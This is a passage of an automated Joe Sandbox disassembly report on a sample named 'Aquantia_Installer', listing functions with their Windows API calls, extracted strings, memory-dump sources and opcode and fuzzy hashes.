Instruction Fuzzy Hash: ED41D672E25239ABDB908FE9C800BEE7A74EF45B68F20421AE41597A50C7784D058B90

Function 6CF2F308 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CF2F345
dllmain_crt_dispatch.LIBCMT ref: 6CF2F35C
dllmain_raw.LIBCMT ref: 6CF2F3A4
dllmain_crt_dispatch.LIBCMT ref: 6CF2F3B7
dllmain_raw.LIBCMT ref: 6CF2F3CA

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: f9e92799d710603e5f9877cdf4b1019726f0b26196f7ee9160741a84283ba7d1
Instruction ID: 263f10ada7b12707771f78568bff901a1067e4b4844f4b77cbf5fff167dc8d8c
Opcode Fuzzy Hash: f9e92799d710603e5f9877cdf4b1019726f0b26196f7ee9160741a84283ba7d1
Instruction Fuzzy Hash: 9D21B572D25239ABDFA18ED5C840EAF3A79EB81BA8F314215F81557A50C7788D018BD0

Function 6CF320FF Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00000001,6CF32539,6CF325CA,?,?,6CF317DC), ref: 6CF32104
_free.LIBCMT ref: 6CF32161
_free.LIBCMT ref: 6CF32197
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CF32539,6CF325CA,?,?,6CF317DC), ref: 6CF321A2

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7d3dc05bc9f7e054c45cb339cfba7219d3200cb9c40532045fe1dc619e2acf0a
Instruction ID: 901e73acc56f6ae4758b8ef544aedb1dbfe50507e5838a1cd17955bef92822c1
Opcode Fuzzy Hash: 7d3dc05bc9f7e054c45cb339cfba7219d3200cb9c40532045fe1dc619e2acf0a
Instruction Fuzzy Hash: 6C11CA367151257ADB4265A98D88F5F33799FC267D7251225F61C82AC1DB32CC0982E0

Function 6CF2F151 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CF2F19E

Part of subcall function 6CF2F61B: InitializeSListHead.KERNEL32(6CF8E188,6CF2F1A8,6CF3F0D8,00000010,6CF2F139,?,?,?,6CF2F361,?,00000001,?,?,00000001,?,6CF3F120), ref: 6CF2F620

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CF2F208

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 37e457febca4b23c842918cc372d6ad11aa4162b64452e8216f00040ab5042fc
Instruction ID: 700615d85bc8d1f243aa50ea52dfc5c3caf40b0e9503849814ff4ef519ba0309
Opcode Fuzzy Hash: 37e457febca4b23c842918cc372d6ad11aa4162b64452e8216f00040ab5042fc
Instruction Fuzzy Hash: 6621D136A26271ABDF80ABF8D401BE93BB09F0772CF11045AD44567FD1CB6E040ECA91

Function 6CF33F7E Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CF33FCA
GetFileType.KERNELBASE(00000000), ref: 6CF33FDC

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 39fc728d48d94f2efa1696c28afd4827d0fdfa018f8d22193beda1ba5ab97cb9
Instruction ID: a09aafe9d5578a2efa2cd4ac1018b75c8d90e52ce10953e39bb0faa7fb0f0b87
Opcode Fuzzy Hash: 39fc728d48d94f2efa1696c28afd4827d0fdfa018f8d22193beda1ba5ab97cb9
Instruction Fuzzy Hash: 8B11D57260876166CB34893E8C84612BEF49783235B34271AD5BDC79E1C335D48BC5C0

Function 6CF32547 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CF3214A,00000001,00000364,00000013,000000FF,?,00000001,6CF32539,6CF325CA,?,?,6CF317DC), ref: 6CF32588

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c6d67091a72c1755f0a9f9918b1d0d51dd596691296eedab1fd6c2bae76526b1
Instruction ID: eb123e5023014ea33205fa16163c61053fcd56b09e54e7f470655696b43cb6c1
Opcode Fuzzy Hash: c6d67091a72c1755f0a9f9918b1d0d51dd596691296eedab1fd6c2bae76526b1
Instruction Fuzzy Hash: 46F0E932652634B6EB969A268C5CB4B3B68AF42774B147011EC2CD7985CB32DF0486F0

Non-executed Functions

Function 010201C0 Relevance: 10.8, Strings: 8, Instructions: 831
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

VWoh, xrefs: 010204A8
XTQQ, xrefs: 010204AF
- >I, xrefs: 010203B1
1/, xrefs: 0102035B
cWgc, xrefs: 010204BD
sJwG, xrefs: 0102049A
wr~5, xrefs: 01020362
CwGC, xrefs: 01020485

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: - >I$1/$CwGC$VWoh$XTQQ$cWgc$sJwG$wr~5
API String ID: 0-2854300807
Opcode ID: f7970a9a2f6ee8f953afa657c9e1c7b96d6897554a49c0e1f163868920dceb13
Instruction ID: 6135a98297013756a2bbfccee6af13d53c0e667d3dc62e184b5ed790466a8535
Opcode Fuzzy Hash: f7970a9a2f6ee8f953afa657c9e1c7b96d6897554a49c0e1f163868920dceb13
Instruction Fuzzy Hash: 9C521370604B508FD735CF39C880766BFE2BF96210F188AADD4E68BB9AD775A405CB50

Function 01009840 Relevance: 10.4, Strings: 8, Instructions: 357COMMON

Download Yara Rule

Strings

%=!, xrefs: 01009924
t, xrefs: 01009B12
,0"2, xrefs: 0100992C
+7-(, xrefs: 01009914
@, xrefs: 01009B4C
?, xrefs: 010098B4
?, xrefs: 01009B64, 01009B74
>46:, xrefs: 01009944

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: %=!$+7-($,0"2$>46:$?$?$@$t
API String ID: 0-1466056752
Opcode ID: 3ecb447a5ca523c94218ac8260823487775fa5b52f8dcaf75c41f601a75e0b54
Instruction ID: f8cdd2b17ac077fb77fdb080cf809c3012e628111c68bab7416664a23cda77ef
Opcode Fuzzy Hash: 3ecb447a5ca523c94218ac8260823487775fa5b52f8dcaf75c41f601a75e0b54
Instruction Fuzzy Hash: 1BA1C67050C3D18AE7228F2995A075BFFE0AFD3648F18499CE5D50B383D379854ACBA6

Function 6CF2F93A Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CF2F946
IsDebuggerPresent.KERNEL32 ref: 6CF2FA12
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CF2FA32
UnhandledExceptionFilter.KERNEL32(?), ref: 6CF2FA3C

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 928d34c3ba7f339d3fe05460ca32214b593d68b137178f55173a7f5416ef02b6
Instruction ID: 5d6b383aba88ef73c835315d0dfcc13f9e7661c1712e8b14f6bbc2f0c7692f95
Opcode Fuzzy Hash: 928d34c3ba7f339d3fe05460ca32214b593d68b137178f55173a7f5416ef02b6
Instruction Fuzzy Hash: 083138B5D1522C9BDF50DFA5C9897CCBBF8BF08304F1041AAE40CAB240EB759A888F44

Function 010391E0 Relevance: 5.6, Strings: 4, Instructions: 594COMMON

Download Yara Rule

Strings

C, xrefs: 0103929C
325, xrefs: 01039401
\, xrefs: 010392A7
0W(U, xrefs: 01039484

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: 0W(U$C$\$325
API String ID: 0-3066721790
Opcode ID: 3fc60939445c94076a0867117865b1ae351a6e14082ba8f7396de78f640ed342
Instruction ID: 8e47a2b48bb67da4b2224c2519537208d658489289ee64532ddcbf7fa13ce4e7
Opcode Fuzzy Hash: 3fc60939445c94076a0867117865b1ae351a6e14082ba8f7396de78f640ed342
Instruction Fuzzy Hash: EE121071A083009BE714CF64CC85B5BBBA8AFC5718F048A2CF9D5AB2C0D7B5D905CB92

Function 6CF322CB Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CF323C3
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CF323CD
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CF323DA

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 67522934e04bff1f4504568d5fc4a4ac2782f71a84fdc7ac3ea540cfa69d200c
Instruction ID: cad2bfe35e26bbe97807730d770bfeca22cec6faac29fb3329b9201b64d2831c
Opcode Fuzzy Hash: 67522934e04bff1f4504568d5fc4a4ac2782f71a84fdc7ac3ea540cfa69d200c
Instruction Fuzzy Hash: FE31B37491122DABCB61DF65D9887CCBBB8BF08314F6041DAE41CA6250EB749B858F84

Function 6CF310C5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6CF310C4,?,00000001,?,?), ref: 6CF310E7
TerminateProcess.KERNEL32(00000000,?,6CF310C4,?,00000001,?,?), ref: 6CF310EE
ExitProcess.KERNEL32 ref: 6CF31100

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 313d4d9a2bc4e38f1555f88f7d062106d2ece696bef1318c3cea7a0a8d4d40a4
Instruction ID: 10431f4959aa89e3630f7fed5ba048fa45c795949163657715456c97bdcb1ab5
Opcode Fuzzy Hash: 313d4d9a2bc4e38f1555f88f7d062106d2ece696bef1318c3cea7a0a8d4d40a4
Instruction Fuzzy Hash: 3AE04671518198FBCF226B96C909AC83BBAEB45245B019014F90D86620CB3ED996DAC0

Function 6CF24160 Relevance: 4.3, Strings: 2, Instructions: 1775COMMON

Download Yara Rule

Strings

+dsi, xrefs: 6CF25129
]8, xrefs: 6CF25042

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: +dsi$]8
API String ID: 0-3838832768
Opcode ID: 66716b98e0d8f05ff804e0ef4c4cc73eeeeb097e94eeb70f4f6cb06a0b62d575
Instruction ID: 28adfc239f855a6181caae5dbc92c8e09f89ee0be323d0174d138d88409a54bb
Opcode Fuzzy Hash: 66716b98e0d8f05ff804e0ef4c4cc73eeeeb097e94eeb70f4f6cb06a0b62d575
Instruction Fuzzy Hash: E9D20136A512198FCB04CEBCC995BEE7BF2BB46314F10815AD419DBB59D63E8A09DF00

Function 010284B0 Relevance: 3.9, Strings: 3, Instructions: 112COMMON

Download Yara Rule

Strings

@K, xrefs: 010285BF
fU, xrefs: 010285B8
OZ, xrefs: 010285B1

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: @K$OZ$fU
API String ID: 0-3622593885
Opcode ID: b1e4f2db202d41de8c363dd3b7156072ed7193fff42a65196c40993f8a07de13
Instruction ID: 6c86b8d5a058767ee05c710e6880302c74f3c3ae144df3135fb1eb60299af2ed
Opcode Fuzzy Hash: b1e4f2db202d41de8c363dd3b7156072ed7193fff42a65196c40993f8a07de13
Instruction Fuzzy Hash: F04114B5C003688BDB24DFA9DC4069EBF72EB51310F24829CD45A7B788D7754946CF91

Function 6CF2E200 Relevance: 3.6, Strings: 2, Instructions: 1077COMMONLIBRARYCODE

Download Yara Rule

Strings

ttK], xrefs: 6CF2EB2D
ttK], xrefs: 6CF2EBA0

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: ttK]$ttK]
API String ID: 0-284419763
Opcode ID: 1e333ac49ef0f9fee7be05a429d8e3eb3e4457990aae3ef2b8936a8577ec78d4
Instruction ID: d9aadd2033328041550625322df7bcee7bfb8690942ebff4fd71107eb01d97ac
Opcode Fuzzy Hash: 1e333ac49ef0f9fee7be05a429d8e3eb3e4457990aae3ef2b8936a8577ec78d4
Instruction Fuzzy Hash: 1572F236F551158FDF08CEFCC4953DEB7F2AB47322F209615D825DBA94C62E890A8B84

Function 01009C00 Relevance: 3.0, Strings: 2, Instructions: 457COMMON

Download Yara Rule

Strings

8, xrefs: 01009E15
DvEU, xrefs: 01009CCF, 01009CDA

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: 8$DvEU
API String ID: 0-3215943700
Opcode ID: ccfe9cd8ab51002ecc399d4c47a890e227e1910a670b0d106a69bd4901daa0e1
Instruction ID: c09f455e2d05b6a912060325af54aa88d8718df96c7322c1135f4d5604ae47e6
Opcode Fuzzy Hash: ccfe9cd8ab51002ecc399d4c47a890e227e1910a670b0d106a69bd4901daa0e1
Instruction Fuzzy Hash: 43D1E4726093809BE315CF25C85079BBFE2FBC5314F188A6DE5D58B291DB39C50ACB92

Function 6CF38951 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CF3894C,?,?,00000008,?,?,6CF385E4,00000000), ref: 6CF38B7E

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ce080c5cc0875d42ef2ce3e0a57da3d44ae37ab43b272d19a73c353f6bcd6208
Instruction ID: 5ee63001a8b620d60d765a05e2d6ac56c04e0a36792b50ddf71a298612d1af49
Opcode Fuzzy Hash: ce080c5cc0875d42ef2ce3e0a57da3d44ae37ab43b272d19a73c353f6bcd6208
Instruction Fuzzy Hash: 56B16F31211615EFDB05CF18C486B557BE0FF45368F25965AE8ADCF6A1C339E982CB80

Function 6CF26670 Relevance: 1.7, Strings: 1, Instructions: 477COMMON

Download Yara Rule

Strings

eV6, xrefs: 6CF26AD9

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: eV6
API String ID: 0-2154276878
Opcode ID: e1446471a53c5d40c5a1050866a2428d35bf0329ebb40bfb6e10cd24bc13c286
Instruction ID: 978d171bfa89c434dca7f4305abc665ff1a0abe9e565189a3abc3bc6954448fe
Opcode Fuzzy Hash: e1446471a53c5d40c5a1050866a2428d35bf0329ebb40bfb6e10cd24bc13c286
Instruction Fuzzy Hash: CDF11476E516049FCF08CEBCD8A47DE7BF2EB46325F209619F825DB794C72A58098B40

Function 6CF2FB08 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CF2FB1E

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d0141e8fcb0bddd220e9f64acca559e8ad9db512ac4098138bfe691bb8b959e1
Instruction ID: 7746626bcc1f0fd30d7cc4f3dfd1d75c7f4b7b7d75b3d322e86af2c4f3b7ce1d
Opcode Fuzzy Hash: d0141e8fcb0bddd220e9f64acca559e8ad9db512ac4098138bfe691bb8b959e1
Instruction Fuzzy Hash: 11516EB1E2261A8FDF84CF95C4817AEB7F4FB4A314F20856AD815EB644D3799A40CF90

Function 6CF32983 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0397c3387af317e7653a6b3de8c17bf036150be8aab0cc39e637b7b7f8a3abba
Instruction ID: 5b12ea114f8ba68876365b326a9ef6c5ad620d3d8c74cc780e1ca1a354d910ac
Opcode Fuzzy Hash: 0397c3387af317e7653a6b3de8c17bf036150be8aab0cc39e637b7b7f8a3abba
Instruction Fuzzy Hash: 6B41B4B1C05229AFDF10CF69CC88AEABBB9AF45304F1452D9E41DD3201DA359E848FA0

Function 01041DA0 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

>?>1, xrefs: 01041F24

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: >?>1
API String ID: 0-245164388
Opcode ID: a41848187ed78856e0cc4ef49d9971f9b846532ebba82b47db06257435c12298
Instruction ID: 84f3fb1cd8d8b6ed17a8f82f7e31a78704fb3572dd78b5aed82e2256600b7ee2
Opcode Fuzzy Hash: a41848187ed78856e0cc4ef49d9971f9b846532ebba82b47db06257435c12298
Instruction Fuzzy Hash: 508114B67083018BD72C9F29D891A6FBBE2EBC5314F198A7CE5D287391D731A845C781

Function 01006370 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 010064A6

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 0af4c2785b0ede1ac2b18171dd5ffacc3cd7985cf361380d3aef21a4375ba1f7
Instruction ID: 2fb1c09645b797b6485071ba2800afe024a68c4c3b2faa9de4f446b65412a8b3
Opcode Fuzzy Hash: 0af4c2785b0ede1ac2b18171dd5ffacc3cd7985cf361380d3aef21a4375ba1f7
Instruction Fuzzy Hash: 6BB148711097819FD321CF18C88061BFFE1AFA9604F448A6DE5D997382D631EA18CBA7

Function 01040F20 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

@, xrefs: 01040FF5

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 2353990acf00f0473b99eaadd4b992f624be7b09477891bcd076503ae0d70e50
Instruction ID: f6dc7d01a53c0e6786061524ef80c264dc0b47fd1a0a93fcd897975433b8d9b6
Opcode Fuzzy Hash: 2353990acf00f0473b99eaadd4b992f624be7b09477891bcd076503ae0d70e50
Instruction Fuzzy Hash: 464101F1A143018BD7198F28C89167BB7E1FF95328F04863CE5D95B295E775A9048781

Function 01041420 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 01041488

Memory Dump Source

